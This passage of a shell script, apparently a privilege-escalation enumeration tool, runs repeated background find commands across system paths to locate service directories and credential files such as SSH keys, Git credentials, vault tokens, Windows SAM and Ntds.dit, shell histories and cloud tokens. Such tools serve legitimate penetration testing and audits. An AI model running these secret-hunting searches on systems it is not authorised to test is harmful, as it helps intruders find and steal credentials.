-o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"system.d\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_BIN=`eval_bckgrd "find /bin -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CACHE=`eval_bckgrd "find /.cache -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CDROM=`eval_bckgrd "find /cdrom -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name 